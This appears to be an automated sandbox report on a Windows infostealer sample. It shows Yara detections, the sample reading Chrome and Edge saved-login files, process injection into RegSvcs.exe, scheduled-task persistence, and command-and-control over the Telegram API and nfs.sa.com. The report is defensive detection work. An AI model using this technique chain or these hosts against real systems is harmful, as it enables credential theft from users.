                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Queries volume information: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 12.2.RegSvcs.exe.403580.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000000C.00000002.2559323570.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 8760, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Source: Yara match, File source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000011.00000002.2559302757.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 9112, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 12.2.RegSvcs.exe.403580.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000000C.00000002.2559323570.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 8760, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Source: Yara match, File source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc6ee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47d82e0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4834880.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.477e2c0.7.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d69948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3dc3968.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3d6cec8.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.4781840.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.ECmmsbHOaKPh.exe.47db860.6.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.g44YQtTyjN.exe.3f96948.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000011.00000002.2559302757.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: g44YQtTyjN.exe PID: 3036, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: ECmmsbHOaKPh.exe PID: 8812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 9112, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in front of a technique is the count shown next to it in the report's matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Scheduled Task/Job; 1 Shared Modules; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 412 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 412 Process Injection; 3 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 11 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph (rendered graph not preserved; node and edge labels recovered from the graph text)

Behavior Graph ID: 1632386; Sample: g44YQtTyjN.exe; Start date: 07/03/2025; Architecture: WINDOWS; Score: 100

Start node: DNS/IP api.telegram.org, nfs.sa.com; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures. Started processes: g44YQtTyjN.exe (badges: 15, 7) and ECmmsbHOaKPh.exe (badges: 14, 6).
api.telegram.org: Uses the Telegram API (likely for C&C communication)
g44YQtTyjN.exe: DNS/IP nfs.sa.com 209.74.88.50, port 443, local ports 49697, 49698, MULTIBAND-NEWHOPEUS, United States; dropped files: C:\Users\user\AppData\...CmmsbHOaKPh.exe (PE32), C:\Users\...CmmsbHOaKPh.exe:Zone.Identifier (ASCII), C:\Users\user\AppData\Local\...\tmp82D7.tmp (XML); signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures. Started processes: powershell.exe (badge 23), powershell.exe (badge 23), RegSvcs.exe (badge 34), 3 other processes.
ECmmsbHOaKPh.exe: signatures: Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes. Started processes: RegSvcs.exe, schtasks.exe.
powershell.exe (both instances): Loading BitLocker PowerShell Module; each started conhost.exe.
RegSvcs.exe (started by g44YQtTyjN.exe): DNS/IP api.telegram.org 149.154.167.220, port 443, local ports 49705, 49706, TELEGRAMRU, United Kingdom.
RegSvcs.exe (started by ECmmsbHOaKPh.exe): Tries to harvest and steal browser information (history, passwords, etc).
schtasks.exe: started conhost.exe. The 3 other processes: started conhost.exe.

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.